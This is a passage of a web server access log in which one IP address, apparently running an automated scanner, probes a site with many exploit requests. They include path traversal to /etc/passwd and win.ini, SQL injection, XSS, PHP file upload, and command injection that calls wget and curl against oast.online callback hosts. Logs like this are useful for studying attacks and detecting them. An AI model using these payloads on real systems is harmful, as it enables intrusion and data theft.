/wiki/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Mobile/15E148 Safari/604.1" 154.84.62.234 - - [24/Apr/2025:07:02:36 -0400] "POST /template/custom/content-editor HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:02:36 -0400] "POST /templates/editor-preload-container HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:07:02:36 -0400] "POST /pages/createpage-entervariables.action HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.20" 154.84.62.234 - - [24/Apr/2025:07:02:36 -0400] "POST /pages/templates2/viewpagetemplate.action HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:02:36 -0400] "POST /confluence/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0" 154.84.62.234 - - [24/Apr/2025:07:02:36 -0400] "POST /pages/doenterpagevariables.action HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:02:36 -0400] "POST /pages/createpage.action?spaceKey=myproj HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0" 154.84.62.234 - caldav_public_user@localhost [24/Apr/2025:07:02:57 -0400] "DELETE /dav/server.php/files/personal/GIVE_ME_ERROR_TO_GET_DOC_ROOT_2021 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" 154.84.62.234 - 
caldav_public_user@localhost [24/Apr/2025:07:03:21 -0400] "GET /dav/server.php/files/personal/%2e%2e/%2e%2e//%2e%2e//%2e%2e/data/settings/settings.xml HTTP/1.1" 200 119072 "-" "Mozilla/5.0 (Knoppix; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:07:03:23 -0400] "POST /webtools/control/SOAPService HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11) AppleWebKit/618.31.14 (KHTML, like Gecko) Version/17.7 Safari/618.31.14" 154.84.62.234 - - [24/Apr/2025:07:04:15 -0400] "GET /owa/auth/x.js HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0" 154.84.62.234 - - [24/Apr/2025:07:04:43 -0400] "GET /misc.php?action=showpopups&type=friend HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:04:45 -0400] "POST /patient/search_result.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/85.0.4183.127 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:04:49 -0400] "POST /admin/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:07:05:10 -0400] "POST /contactus.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:05:25 -0400] "POST /contactus.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:07:06:02 -0400] "POST /contactus.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:07:06:12 -0400] "POST /contactus.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0" 154.84.62.234 - - 
[24/Apr/2025:07:06:16 -0400] "POST /api/snapshots HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:08:22 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.6.27" 154.84.62.234 - - [24/Apr/2025:07:10:06 -0400] "POST /lumis/portal/controller/xml/PageControllerXml.jsp HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363" 154.84.62.234 - - [24/Apr/2025:07:10:42 -0400] "GET /solr/admin/cores?wt=json HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:10:43 -0400] "GET /assets/app/something/services/AppModule.class/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" 154.84.62.234 - guest [24/Apr/2025:07:11:04 -0400] "GET /log_download.cgi?type=../../etc/passwd HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.5.20" 154.84.62.234 - admin [24/Apr/2025:07:11:09 -0400] "GET /log_download.cgi?type=../../etc/passwd HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.27" 154.84.62.234 - - [24/Apr/2025:07:11:20 -0400] "POST /webtools/control/SOAPService HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 154.84.62.234 - guest [24/Apr/2025:07:11:46 -0400] "GET /backup2.cgi HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" 154.84.62.234 - admin [24/Apr/2025:07:11:52 -0400] "GET /backup2.cgi HTTP/1.1" 
200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:07:12:04 -0400] "POST /seo/seopanel/login.php?sec=forgot HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) LoiLoNote/19.0.0 Version/17.1.2 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:07:12:05 -0400] "POST / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36" 154.84.62.234 - guest [24/Apr/2025:07:12:05 -0400] "POST /tools.cgi HTTP/1.1" 200 0 "https://mgrokokbet.id/tools.cgi" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:07:12:05 -0400] "POST /webtools/control/SOAPService HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0" 154.84.62.234 - admin [24/Apr/2025:07:12:10 -0400] "POST /tools.cgi HTTP/1.1" 200 0 "https://mgrokokbet.id/tools.cgi" "Mozilla/5.0 (Ubuntu; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:07:12:39 -0400] "POST /HandleEvent HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5.2 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:07:12:46 -0400] "POST /index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:07:12:48 -0400] "PATCH /redfish/v1/SessionService/ResetPassword/1/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0" 154.84.62.234 - - [24/Apr/2025:07:12:53 -0400] "POST /redfish/v1/SessionService/Sessions/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:07:13:02 -0400] "POST 
/nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:07:13:10 -0400] "POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1" 200 0 "-" "Nacos-Server" 154.84.62.234 - - [24/Apr/2025:07:13:20 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.1) AppleWebKit/618.27 (KHTML, like Gecko) Version/17.4 Safari/618.27" 154.84.62.234 - - [24/Apr/2025:07:13:28 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:13:41 -0400] "POST /goform/setmac HTTP/1.1" 200 0 "https://mgrokokbet.id/index.htmlr" "Mozilla/5.0 (X11; Linux i686; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:07:14:02 -0400] "POST / HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:07:14:14 -0400] "GET /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products[]=1%20AND%20(SELECT%203875%20FROM%20(SELECT(SLEEP(8)))xoOt) HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:14:19 -0400] "GET /module/productcomments/CommentGrade?id_products[]=1*if(now()=sysdate()%2Csleep(8)%2C0) HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.6.16" 154.84.62.234 - - [24/Apr/2025:07:14:52 -0400] "GET /appGet.cgi?hook=get_cfg_clientlist() HTTP/1.1" 200 0 "https://mgrokokbet.id" "asusrouter--" 154.84.62.234 - - [24/Apr/2025:07:15:30 -0400] "GET /search.php?search=%22;wget+http%3A%2F%2Fd04qr7ij4pq19d75k490bspy3a3rw9khd.oast.online%27;%22 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux 
x86_64; rv:125.0) Gecko/20100101 Firefox/125.0" 154.84.62.234 - - [24/Apr/2025:07:15:51 -0400] "GET /admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name=2w9rfcwlQSpBxAF0zRcFOYag4GJ.php&target=l1_Lw HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0" 154.84.62.234 - - [24/Apr/2025:07:16:04 -0400] "GET /t/index.php?action[]=aaaa HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:16:15 -0400] "GET /status.htm HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:16:44 -0400] "POST /RPC2_Login HTTP/1.1" 200 0 "https://mgrokokbet.id" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:17:13 -0400] "GET //uapi-cgi/certmngr.cgi?action=createselfcert&local=anything&country=AA&state=%24(wget%20http://d04qr7ij4pq19d75k490npegngfoptdrb.oast.online)&organization=anything&organizationunit=anything&commonname=anything&days=1&type=anything HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.4.15" 154.84.62.234 - - [24/Apr/2025:07:17:47 -0400] "GET /\\u001B]8;;https://interact.sh\"/onmouseover=\"alert(1)\\u0007example\\u001B]8;;\\u0007 HTTP/1.1" 403 1242 "-" "-" 154.84.62.234 - - [24/Apr/2025:07:17:47 -0400] "POST /tc.CBS.Appl/tcspseudo HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:18:21 -0400] "POST /_ignition/execute-solution HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.5.23" 154.84.62.234 - - [24/Apr/2025:07:18:25 -0400] "POST 
/_ignition/execute-solution HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.3.27" 154.84.62.234 - - [24/Apr/2025:07:18:30 -0400] "POST /_ignition/execute-solution HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" 154.84.62.234 - - [24/Apr/2025:07:18:36 -0400] "POST /_ignition/execute-solution HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux i686; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:07:18:41 -0400] "POST /_ignition/execute-solution HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:18:45 -0400] "POST /_ignition/execute-solution HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:19:01 -0400] "POST /Config/SaveUploadedHotspotLogoFile HTTP/1.1" 200 0 "https://mgrokokbet.id" "Mozilla/5.0 (X11; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0" 154.84.62.234 - - [24/Apr/2025:07:19:10 -0400] "GET /Assets/temp/hotspot/img/logohotspot.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 12_0) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:07:19:25 -0400] "GET /%u002e/WEB-INF/web.xml HTTP/1.1" 403 1242 "-" "-" 154.84.62.234 - - [24/Apr/2025:07:19:55 -0400] "POST /?Command=NOOP&InternalFile=../../../../../../../../../../../../../../Windows/win.ini&NewWebClient=1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:20:18 -0400] "POST /goform/formWsc HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0" 154.84.62.234 - - [24/Apr/2025:07:20:44 -0400] "GET 
/?action=command&command=set_city_timezone&value=$(wget%20http://d04qr7ij4pq19d75k4905rfhes57bpker.oast.online)) HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:21:02 -0400] "GET /bludit/admin/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux i686; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:07:21:17 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "https://mgrokokbet.id" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:21:23 -0400] "POST /wp-login.php HTTP/1.1" 200 0 "https://mgrokokbet.id" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:21:28 -0400] "GET /wp-admin/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:21:48 -0400] "POST /cgi/networkDiag.cgi HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0 Mobile/15E148 Safari/604.1" 154.84.62.234 - - [24/Apr/2025:07:22:22 -0400] "PUT /SDK/webLanguage HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux i686; rv:121.0) Gecko/20100101 Firefox/121.0" 154.84.62.234 - - [24/Apr/2025:07:22:28 -0400] "POST /ajaxPages/writeBrowseFilePathAjax.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Debian; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:07:22:28 -0400] "GET /x HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:22:28 -0400] "POST /druid/indexer/v1/sampler?for=connect HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like 
Gecko) Chrome/120.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:22:33 -0400] "GET /2w9rfZaegckUtmox9ngqw5zJpwm.php?cmd=sudo+rpm+--eval+'%25{lua%3aos.execute(\"curl+http%3a//d04qr7ij4pq19d75k490m9tiikesim9tm.oast.online+-H+'User-Agent%3a+3A8PnQ'\")}' HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0" 154.84.62.234 - - [24/Apr/2025:07:22:33 -0400] "GET /dashboardUser HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.45" 154.84.62.234 - - [24/Apr/2025:07:22:51 -0400] "GET /wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3C%2Fh1%3E26 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11) AppleWebKit/617.16.12 (KHTML, like Gecko) Version/17.7.92 Safari/617.16.12" 154.84.62.234 - - [24/Apr/2025:07:23:16 -0400] "GET /module/ph_simpleblog/list?sb_category=')%20OR%20true--%20- HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 12.5) AppleWebKit/617.19 (KHTML, like Gecko) Version/17.6.47 Safari/617.19" 154.84.62.234 - - [24/Apr/2025:07:23:16 -0400] "POST /home/download HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:23:21 -0400] "GET /module/ph_simpleblog/list?sb_category=')%20AND%20false--%20- HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0" 154.84.62.234 - - [24/Apr/2025:07:23:35 -0400] "POST /wsman HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:71.0) Gecko/20100101 Firefox/71.0" 154.84.62.234 - - [24/Apr/2025:07:23:38 -0400] "POST / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:24:05 -0400] "GET /nagiosxi/login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; 
x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041" 154.84.62.234 - - [24/Apr/2025:07:24:16 -0400] "GET /login/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.4.24" 154.84.62.234 - - [24/Apr/2025:07:24:26 -0400] "GET /wp-admin/admin-ajax.php?action=280b059023b35979da9ee2d4657804cf HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:07:24:31 -0400] "GET /wp-admin/admin-ajax.php?action=1cac25121ae8293459fe69f8dc8cbb7c HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:07:24:55 -0400] "POST / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0" 154.84.62.234 - - [24/Apr/2025:07:25:10 -0400] "POST /controller/origemdb.php?idselorigem=ATIVOS HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:78.0) Gecko/20100101 Firefox/78.0" 154.84.62.234 - - [24/Apr/2025:07:25:18 -0400] "POST /controller/login.php?acao=autenticar HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:07:25:21 -0400] "POST / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:07:25:24 -0400] "POST /controller/login.php?acao=autenticar HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063" 154.84.62.234 - - [24/Apr/2025:07:26:03 -0400] "POST / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0" 154.84.62.234 - - [24/Apr/2025:07:26:33 -0400] "GET 
/api/v1/components?name=1&1%5B0%5D&1%5B1%5D=a&1%5B2%5D&1%5B3%5D=or+'a'='a')%20and%20(select%20sleep(6))-- HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:26:35 -0400] "POST /wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux i686; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:07:28:33 -0400] "GET /api/help'onmouseover=alert(document.domain)/'/;/beta/license HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (SS; Linux i686; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:07:29:30 -0400] "POST /cobbler_api HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:29:46 -0400] "GET /geoserver/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:29:50 -0400] "GET /about/../tree?action=get HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.7.18" 154.84.62.234 - - [24/Apr/2025:07:31:05 -0400] "POST /install.php?page=4 HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:07:31:06 -0400] "POST /install.php?page=4 HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0" 154.84.62.234 - - [24/Apr/2025:07:31:25 -0400] "POST /install.php?page=1 HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:31:30 -0400] "POST /v1/backend1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) 
Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:07:31:35 -0400] "GET /v1/2w9rfWTh24NDL8bVRlWffySuWgh.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:32:13 -0400] "POST /install.php?page=4 HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.35" 154.84.62.234 - - [24/Apr/2025:07:32:44 -0400] "POST /install.php?page=4 HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0" 154.84.62.234 - - [24/Apr/2025:07:32:46 -0400] "POST /install.php?page=4 HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (SS; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:07:32:55 -0400] "POST /./RestAPI/LogonCustomization HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:07:33:05 -0400] "POST /./RestAPI/LogonCustomization HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0" 154.84.62.234 - - [24/Apr/2025:07:33:14 -0400] "POST /api/v1/login/oauth2/auth HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) 